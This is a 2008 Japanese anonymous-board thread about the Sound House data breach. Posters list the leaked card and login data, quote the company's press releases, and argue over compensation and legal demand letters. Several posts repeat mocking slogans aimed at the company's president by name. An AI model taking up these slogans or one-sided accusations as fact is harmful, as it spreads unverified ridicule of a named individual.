>  メール、電話、サウンドハウス掲示板で、実際対応を受けた方、対応、言動は如何でしたか ?
・カード会社から来た。(オンラインゲーム数社利用、カード会社判断で停止)
・サウンドハウスから来ない。(カード会社から個別に被害者情報が来てないと言い張っている) 
・カード不正使用。(10万円台で、カード会社自主停止。本人不使用申請書郵送)
・カード変更。(勿論、オーダーキャンセル等、不自由期間長し)
・個人情報流出。(電話、メールでもきちんと答えられないし、言葉遣いが失礼極まり無い)
・諸手続き、不都合の時間換算被害。(電話だメールだと、時間換算して、サウンドハウスに請求手続き、カード会社が把握して無かったら地獄だった、褒める。)
・実害心理的被害。(サウンドハウスの対応等、言葉遣いが許しがたい。)
186名刺は切らしておりまして:2008/05/05(月) 11:34:50 ID:3c7CtRZk
ま、被害にあった顧客が、それでも今後使うか否か判断すれば良い事。
クレカが使えない時点で、新規の客は増えない。
187ネット界の5年保証:2008/05/05(月) 14:52:58 ID:VBAsHhjC
ネット界の5年保証。

>「音屋といえばカード漏洩責任放棄」。
>「音屋といえばカード漏洩責任放棄」。
>「音屋といえばカード漏洩責任放棄」。

>「史上初 ! PDF炎上」サウンドハウス社長 中島尚彦。
>「史上初 ! PDF炎上」サウンドハウス社長 中島尚彦。
>「史上初 ! PDF炎上」サウンドハウス社長 中島尚彦。

>「個人情報流出マラソン」サウンドハウス社長 中島尚彦。
>「個人情報流出マラソン」サウンドハウス社長 中島尚彦。
>「個人情報流出マラソン」サウンドハウス社長 中島尚彦。
188サウンドハウス個人情報流出事件:2008/05/06(火) 16:35:20 ID:S3ohYdeH
・株式会社サウンドハウス個人情報流出事件発表概要  
「流出した可能性がある個人情報は、2007年1月1日から2008年3月22日までに新規会員登録を行った顧客の
個人情報12万2884件のうちの最大9万7500件。流出したデータは、氏名や性別、生年月日、メールアドレス、
パスワードだが、そのうち2万7743件については、カード名義やカード番号、有効期限など含まれていた」

代表取締役社長 中島 尚彦、従業員、発表、公式プレスリリース。
http://www.soundhouse.co.jp/staff/staff.asp
http://www.soundhouse.co.jp/news/20080418.pdf

・株式会社サウンドハウスより流出した個人情報について
「お名前」 「フリガナ」 「性別」 「生年月日」
「サウンドハウス ログイン用メールアドレス」 「サウンドハウス ログイン用パスワード」
「クレジットカード情報(会社名・カード番号・有効期限・ご名義)」

1. カード不正使用実被害、個人情報流出被害に遭われた方。
2. 個人情報流出被害に遭われた方。
3. 個人情報、配達注文のご経験のある方。

サウンドハウスを一度でも利用された方は、被害者予備軍です。
過去に遡り、購入履歴、連絡先、配達先が企業として、商法上保存されています。
連絡可能な葉書等の手段さえも放棄、連絡出来る筈の、お客様への報告義務を放棄しました。

クレジットカード不正使用の実害が、多数報告されています。
クレジットカード会社のHP、お問い合わせを参考に、至急対策をとって下さい。
名前や住所、個人情報からストーカーや変質者、詐欺や強盗、現金をだまし取られる等、犯罪に巻き込まれる危険性。
ユーザーIDとパスワードは、本人認証するための情報として、盗まれると、本人になりすまし悪用、お金に匹敵する価値があります。

1. 管理責任上、"加害者サウンドハウス"、"被害者お客様が成立"。
2. クレジット会社、中国、中国人等、矛先を代える発言、発表に過ぎません。
3. セキュリティ等の問題に、"お客様の自己責任は存在しません"。

「販売業者が、個人情報を預かった時点で、管理責任が生じます。」
189サウンドハウス個人情報流出事件:2008/05/06(火) 17:48:54 ID:S3ohYdeH
・代表取締役社長 中島 尚彦 2008年4月18日プレスリリース。
http://www.soundhouse.co.jp/news/20080418.pdf
>2006年、6月29日、中国のプログにおいて何と、サウンドハウスが名指しで公開され、そのサイトに侵入することが成功した事例が解説されていたのです。
>そして今年の2月18日、同様に中国のサイトで弊社の名前が再度掲載され、それが引き金となって、3月ll日からの集中攻撃へと発展しました。
>プレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております。

・カード会社との対立、クレジットカード利用が再開できない。 
>当初からカード会社と意見が対立することもありました。
>クレジットカードの再開にあたっては、協力してくださるどころか、驚くほど高額な調査費用のかかるサービスを、再開の条件として提示してきました。
>既に弊社はカードの利用を止め、営業に大きな打撃を受けているにもかかわらず、更に追い込みをかけるように多額な負担を要求してくるのには閉口してしまいました。
>クレジットカード利用が再開できない理由が見当たりません。
>もし本当にセキュリティ対策をクレジットカード会社を重視するならば、加盟店が当初、申請をする時点で、セキュリティ対策がしっかりとられているかどうか、一定の基準を設けてチェックし、それにバスした店舖のみを加盟店とするべきでしょう。
>ところが現実にはカード会社同士の営業競争があるのでしょうか、加盟店を安易に増やすことが優先され、問題が生じた時にのみ調査をするという、逆の順序になってしまっています」
>クレジットカード利用が再開できない理由が見当たりません。

・情報漏えい事件発生後における代表取締役杜長 中島尚彦による、アンチエイジングの一貫としてマラソン参加。
http://www.naritacity.com/journal/main/journal_main_080415.asp 
>佐倉健康マラソンで元気一杯 !
>弊社代表は、アンチエイジングの一貫として、また地域新聞のライターとして、日々走っております。
>3月30日の時点においては調査会社の報告待ちということもあり、この時点で出来ることは全て対応した上で、参加を決めています。
>桜が満開の湖沿いを3時間走るだけで頭が冴えて、その後の仕事にもより一層、気合が入るものです。
>3月30日以降も、大量にカード不正利用被害が発生しました。

・お知らせ 代表取締役社長 中島尚彦 2008年4月30日。 
http://www.soundhouse.co.jp/news/oshirase.asp
>今回、弊社へのサイバー攻撃は、海外を発端とし、しかもそのルーツが2006年まで遡るという手口であり、昨今話題になっている他社の会社内部からの漏洩事件とは一線を画しております。
>流出に至ってしまったことにつきましては、当然ながら弊社にも責任があり
>今、サウンドハウスができること、それは最先端のセキュリティ対策を施し、安心してお客様にご利用して頂けるサイトを提供することにあります。
>優れたセキュリティ対策を継続していくことをお約束します。

http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm 
<META name="GENERATOR" content="IBM HomePage Builder Frame Editor V3.0 for Windows">
190サウンドハウス個人情報流出事件:2008/05/07(水) 22:56:08 ID:bVO3gGe1
・株式会社サウンドハウス個人情報流出事件。 
 株式会社サウンドハウスより流出した個人情報。 
「お名前」 「フリガナ」 「性別」 「生年月日」
「メールアドレス」 「パスワード」
「クレジットカード情報(会社名・カード番号・有効期限・ご名義)」

・代表取締役社長 中島 尚彦 公式プレスリリース。
 http://www.soundhouse.co.jp/staff/staff.asp
 http://www.soundhouse.co.jp/news/20080418.pdf
>2006年、6月29日、中国のプログにおいて何と、サウンドハウスが名指しで公開され、そのサイトに侵入することが成功した事例が解説されていたのです。
>クレジットカード利用が再開できない。 
>当初からカード会社と意見が対立することもありました。

・情報漏えい事件発生後に、代表取締役社長 中島尚彦による、マラソン参加。
 http://www.naritacity.com/journal/main/journal_main_080415.asp 
>佐倉健康マラソンで元気一杯 !
>弊社代表は、アンチエイジングの一貫として、また地域新聞のライターとして、日々走っております。
>3月30日の時点においては調査会社の報告待ちということもあり、この時点で出来ることは全て対応した上で、参加を決めています。
>桜が満開の湖沿いを3時間走るだけで頭が冴えて、その後の仕事にもより一層、気合が入るものです。

・お知らせ「当然ながら弊社にも責任があり」代表取締役社長 中島尚彦 
 http://www.soundhouse.co.jp/news/oshirase.asp
>流出に至ってしまったことにつきましては、当然ながら弊社にも責任があり
>今、サウンドハウスができること、それは最先端のセキュリティ対策を施し、安心してお客様にご利用して頂けるサイトを提供することにあります。
 http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm 
>掲示板は、ビギナー向けホームページ制作ソフトで作成。(IBM HomePage Builder Frame Editor V3.0 for Windows)
191音屋といえばカード漏洩責任放棄:2008/05/07(水) 23:07:13 ID:bVO3gGe1
1. 管理責任上、"加害者サウンドハウス"、"被害者お客様が成立"。
2. クレジット会社、中国、中国人等、矛先を代える発言、発表に過ぎません。
3. セキュリティ等の問題に、"お客様の自己責任は存在しません"。

「販売業者が、個人情報を預かった時点で、管理責任が生じます。」

ネット社会の5年浸透保証。
「音屋といえばカード漏洩責任放棄」。
「史上初 ! PDF炎上」サウンドハウス社長 中島尚彦。
「個人情報流出マラソン」サウンドハウス社長 中島尚彦。
192名刺は切らしておりまして:2008/05/07(水) 23:13:08 ID:NXr/bc0u
>>190
>掲示板は、ビギナー向けホームページ制作ソフトで作成。(IBM HomePage Builder Frame Editor V3.0 for Windows)


サイト自体をビギナー向けWindowsサーバーで構築。(Windows Server 2003 Microsoft-IIS/6.0)
http://headlines.yahoo.co.jp/hl?a=20080425-00000011-inet-secu


193常識が無い人の見解:2008/05/08(木) 23:55:11 ID:Hyc+KAO8
内容証明も知らない子が必死です。
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm 

世の中には 2008/05/08 3:02:55 常識っちゅ〜もんがあるのよ ***
サウンドハウスが裁判を望んでるのかどうか知らないが、常識で考えて支払う理由が無いのにどうやって個別対応で支払いをするんだ?
支払いの要求は内 容 証 明 郵便で行うのが良い。書式はネットで検索すれば良い。電話で要求しても言った言わないで話にならない。録音しておいても編集した痕跡が見つかればあんたの負けになる。
要求方法としては、何月何日までに回答が無い場合はこちらの主張を認めたと解釈する。支払い日は○月○日とするが支払いが無い場合には民 事 訴 訟を請求する。
としておこう。いずれにしても払うわけがないので民 事 訴 訟になるだけだろう。
ママにおねだりするのと話が違うんだよ。

>掲示板は、ビギナー向けホームページ制作ソフトで作成。(IBM HomePage Builder Frame Editor V3.0 for Windows)
>サイト自体をビギナー向けWindowsサーバーで構築。(Windows Server 2003 Microsoft-IIS/6.0)
>「音屋といえばカード漏洩責任放棄」。
>「史上初 ! PDF炎上」サウンドハウス社長 中島尚彦。
>「個人情報流出マラソン」サウンドハウス社長 中島尚彦。
194続・常識が無い人の見解
「その常識って 2008/05/09 1:16:36 なんですか?」
>>常識で考えて支払う理由が無いのに
>たびたびすみません。
>その常識とは具体的にどういったものですか?

「就職しないとわかんないね 2008/05/09 2:22:35 お小遣いと違うから」
>法人が何らかの支払いをする場合に必用な常識
>就職して会社で使うものを購入する時にきっとわかるようになるよ。
不思議な日本語入力してます。

「そもそも 2008/05/09 11:23:45 GW越えてもか」
GW超えても反省しないのか ? 何して遊んでたんだよ ?
>何を補償してほしいんだい?
>あなたの具体的な損害は何?
>「これこれこういう実害を誰々から受けて、その結果私はこれこれこういう状態にあります。」のような。
偉そうに>>>
>この会社のやり方は体育会系で勢い任せな上に、少々乱暴ではありますが、
>身を削った誠意のある対応をしていると思います。
>葉書一枚でお詫びしておしまい、とかテレビの前で頭下げておしまいっとかじゃないんですから。
中途半端に「ですます」>>>
>自分の恥をさらすほどの内容で、経過の開示まで行なっています。
>書き方も乱暴ですが、他の企業にはできない業でしょう。
褒めちぎる>>>
>あなたが、ここまでやってる要因をぜひ知りたいです。
貴方の部署とお名前を知りたい。